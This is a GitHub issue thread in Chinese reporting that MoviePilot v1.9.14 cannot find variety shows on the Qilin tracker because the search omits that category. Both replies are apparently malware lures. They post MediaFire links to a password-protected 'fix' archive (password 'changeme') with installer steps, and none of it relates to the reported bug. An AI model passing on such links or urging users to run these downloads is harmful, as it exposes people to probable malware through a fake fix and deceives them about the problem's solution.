### ISSUE TITLE
[错误报告]: 麒麟站无法正常搜索综艺节目

### ISSUE THREAD

**Issue by zqr007007** [jxxghp/MoviePilot#2663]
### 确认

- [X] 我的版本是最新版本，我的版本号与 [version](https://github.com/jxxghp/MoviePilot/releases/latest) 相同。
- [X] 我已经 [issue](https://github.com/jxxghp/MoviePilot/issues) 中搜索过，确认我的问题没有被提出过。
- [X] 我已经 [Telegram频道](https://t.me/moviepilot_channel) 中搜索过，确认我的问题没有被提出过。
- [X] 我已经修改标题，将标题中的 描述 替换为我遇到的问题。

### 当前程序版本

 v1.9.14

### 运行环境

Docker

### 问题类型

主程序运行问题

### 问题描述

麒麟站无法正常搜索综艺节目，试过直接搜索与搜索站点资源，均无法搜索麒麟的综艺节目，
举例：《喜人奇妙夜》《脱口秀和ta的朋友们》
将日志中麒麟的搜索链接打开，发现并未勾选“综艺”选项。

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
